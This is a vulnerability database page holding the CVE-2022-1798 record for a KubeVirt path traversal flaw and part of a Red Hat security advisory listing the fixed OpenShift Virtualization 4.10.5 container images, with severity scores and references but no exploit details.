Action not permitted
Modal body text goes here.
CVE-2022-1798
Vulnerability from cvelistv5
▼ | URL | Tags | |
---|---|---|---|
cve-coordination@google.com | https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364 | Exploit, Mitigation, Patch, Third Party Advisory |
▼ | Vendor | Product |
---|---|---|
Google LLC | Kubevirt |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:17:00.704Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "platforms": [ "all" ], "product": "Kubevirt", "vendor": "Google LLC", "versions": [ { "lessThan": "0.55.1", "status": "affected", "version": "unspecified", "versionType": "custom" }, { "lessThan": "0.56.0", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "value": "Oliver Brooks and James Klopchic of NCC Group" }, { "lang": "en", "value": "Diane Dubois and Roman Mohr of Google" } ], "descriptions": [ { "lang": "en", "value": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-20", "description": "CWE-20 Improper Input Validation", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-09-15T15:45:12", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364" } ], "source": { "discovery": "EXTERNAL" }, "title": "Path Traversal vulnerability in Kubevirt", "x_generator": { "engine": "Vulnogram 0.0.9" }, "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "security@google.com", "ID": "CVE-2022-1798", "STATE": "PUBLIC", "TITLE": "Path Traversal vulnerability in Kubevirt" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Kubevirt", "version": { "version_data": [ { "platform": "all", "version_affected": "\u003c", "version_value": "0.55.1" }, { "platform": "all", "version_affected": "\u003c", "version_value": "0.56.0" } ] } } ] }, "vendor_name": "Google LLC" } ] } }, "credit": [ { "lang": "eng", "value": "Oliver Brooks and James Klopchic of NCC Group" }, { "lang": "eng", "value": "Diane Dubois and Roman Mohr of Google" } ], "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible." } ] }, "generator": { "engine": "Vulnogram 0.0.9" }, "impact": { "cvss": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H", "version": "3.1" } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-20 Improper Input Validation" } ] } ] }, "references": { "reference_data": [ { "name": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364", "refsource": "CONFIRM", "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364" } ] }, "source": { "discovery": "EXTERNAL" } } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2022-1798", "datePublished": "2022-09-15T15:45:12", "dateReserved": "2022-05-19T00:00:00", "dateUpdated": "2024-08-03T00:17:00.704Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1", "meta": { "nvd": "{\"cve\":{\"id\":\"CVE-2022-1798\",\"sourceIdentifier\":\"cve-coordination@google.com\",\"published\":\"2022-09-15T16:15:10.107\",\"lastModified\":\"2022-09-19T18:52:17.383\",\"vulnStatus\":\"Analyzed\",\"descriptions\":[{\"lang\":\"en\",\"value\":\"A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible.\"},{\"lang\":\"es\",\"value\":\"Una vulnerabilidad de salto de ruta en KubeVirt versiones hasta 0.56 (y 0.55.1) en todas las plataformas permite a un usuario capaz de configurar el kubevirt para leer archivos arbitrarios en el sistema de archivos del host que son legibles p\u00fablicamente o que son legibles para UID 107 o GID 107. /proc/self/() no es accesible\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\"},\"exploitabilityScore\":2.0,\"impactScore\":4.0},{\"source\":\"cve-coordination@google.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"HIGH\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\"},\"exploitabilityScore\":2.0,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]},{\"source\":\"cve-coordination@google.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*\",\"versionStartIncluding\":\"0.20.0\",\"versionEndExcluding\":\"0.55.1\",\"matchCriteriaId\":\"E3E349C1-0216-47B4-B160-13C5B99BC633\"}]}]}],\"references\":[{\"url\":\"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364\",\"source\":\"cve-coordination@google.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Patch\",\"Third Party Advisory\"]}]}}" } }
rhsa-2022_6351
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Red Hat OpenShift Virtualization release 4.10.5 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "OpenShift Virtualization is Red Hat\u0027s virtualization solution designed for Red Hat OpenShift Container Platform.\n\nThis advisory contains the following OpenShift Virtualization 4.10.5 images:\n\nRHEL-8-CNV-4.10\n===============\ncluster-network-addons-operator-container-v4.10.5-1\nkubemacpool-container-v4.10.5-1\nvirt-cdi-importer-container-v4.10.5-1\nhyperconverged-cluster-operator-container-v4.10.5-1\nhostpath-provisioner-operator-container-v4.10.5-1\nvirtio-win-container-v4.10.5-1\nvirt-cdi-cloner-container-v4.10.5-1\nkubevirt-ssp-operator-container-v4.10.5-1\ncnv-containernetworking-plugins-container-v4.10.5-1\nhyperconverged-cluster-webhook-container-v4.10.5-1\nvirt-cdi-apiserver-container-v4.10.5-1\novs-cni-plugin-container-v4.10.5-1\nvirt-cdi-uploadserver-container-v4.10.5-1\nvirt-cdi-uploadproxy-container-v4.10.5-1\nvirt-cdi-controller-container-v4.10.5-1\nkubevirt-template-validator-container-v4.10.5-1\nvirt-cdi-operator-container-v4.10.5-1\nhostpath-provisioner-container-v4.10.5-1\nhostpath-csi-driver-container-v4.10.5-1\nkubernetes-nmstate-handler-container-v4.10.5-1\novs-cni-marker-container-v4.10.5-1\nbridge-marker-container-v4.10.5-1\nnode-maintenance-operator-container-v4.10.5-1\ncnv-must-gather-container-v4.10.5-2\nvirt-controller-container-v4.10.5-3\nvirt-api-container-v4.10.5-3\nvirt-handler-container-v4.10.5-3\nvirt-operator-container-v4.10.5-3\nvirt-artifacts-server-container-v4.10.5-3\nvirt-launcher-container-v4.10.5-3\nlibguestfs-tools-container-v4.10.5-3\nhco-bundle-registry-container-v4.10.5-6\n\nSecurity Fix(es):\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\n* go-restful: Authorization Bypass Through User-Controlled Key (CVE-2022-1996)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2022:6351", "url": "https://access.redhat.com/errata/RHSA-2022:6351" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important" }, { "category": "external", "summary": "2070366", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2070366" }, { "category": "external", "summary": "2094982", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2094982" }, { "category": "external", "summary": "2099324", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2099324" }, { "category": "external", "summary": "2117872", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872" }, { "category": "external", "summary": "2118367", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2118367" }, { "category": "external", "summary": "2120061", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2120061" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6351.json" } ], "title": "Red Hat Security Advisory: OpenShift Virtualization 4.10.5 Images security and bug fix update", "tracking": { "current_release_date": "2024-11-25T08:02:28+00:00", "generator": { "date": "2024-11-25T08:02:28+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.1" } }, "id": "RHSA-2022:6351", "initial_release_date": "2022-09-06T14:00:38+00:00", "revision_history": [ { "date": "2022-09-06T14:00:38+00:00", "number": "1", "summary": "Initial version" }, { "date": "2022-09-06T14:00:38+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-25T08:02:28+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "CNV 4.10 for RHEL 8", "product": { "name": "CNV 4.10 for RHEL 8", "product_id": "8Base-CNV-4.10", "product_identification_helper": { "cpe": "cpe:/a:redhat:container_native_virtualization:4.10::el8" } } } ], "category": "product_family", "name": "OpenShift Virtualization" }, { "branches": [ { "category": "product_version", "name": "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "product": { "name": "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "product_id": "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", "product_identification_helper": { "purl": "pkg:oci/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/bridge-marker\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "product": { "name": "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "product_id": "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", "product_identification_helper": { "purl": "pkg:oci/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "product": { "name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "product_id": "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", "product_identification_helper": { "purl": "pkg:oci/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "product": { "name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "product_id": "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", "product_identification_helper": { "purl": "pkg:oci/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8\u0026tag=v4.10.5-2" } } }, { "category": "product_version", "name": "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "product": { "name": "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "product_id": "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", "product_identification_helper": { "purl": "pkg:oci/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry\u0026tag=v4.10.5-6" } } }, { "category": "product_version", "name": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "product": { "name": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "product_id": "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "product_identification_helper": { "purl": "pkg:oci/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver-rhel8\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "product": { "name": "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "product_id": "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", "product_identification_helper": { "purl": "pkg:oci/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "product": { "name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "product_id": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", "product_identification_helper": { "purl": "pkg:oci/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "product": { "name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "product_id": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", "product_identification_helper": { "purl": "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "product": { "name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "product_id": "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", "product_identification_helper": { "purl": "pkg:oci/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "product": { "name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "product_id": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", "product_identification_helper": { "purl": "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "product": { "name": "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "product_id": "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", "product_identification_helper": { "purl": "pkg:oci/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubemacpool\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "product": { "name": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "product_id": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", "product_identification_helper": { "purl": "pkg:oci/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubernetes-nmstate-handler-rhel8\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "product": { "name": "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "product_id": "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "product": { "name": "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "product_id": "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "product": { "name": "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "product_id": "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", "product_identification_helper": { "purl": "pkg:oci/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools\u0026tag=v4.10.5-3" } } }, { "category": "product_version", "name": "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "product": { "name": "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "product_id": "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", "product_identification_helper": { "purl": "pkg:oci/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/node-maintenance-operator\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "product": { "name": "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "product_id": "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", "product_identification_helper": { "purl": "pkg:oci/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "product": { "name": "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "product_id": "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", "product_identification_helper": { "purl": "pkg:oci/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "product": { "name": "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "product_id": "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-api\u0026tag=v4.10.5-3" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "product": { "name": "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "product_id": "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server\u0026tag=v4.10.5-3" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "product": { "name": "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "product_id": "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver\u0026tag=v4.10.5-1" } } }, { "category": "product_version", "name": 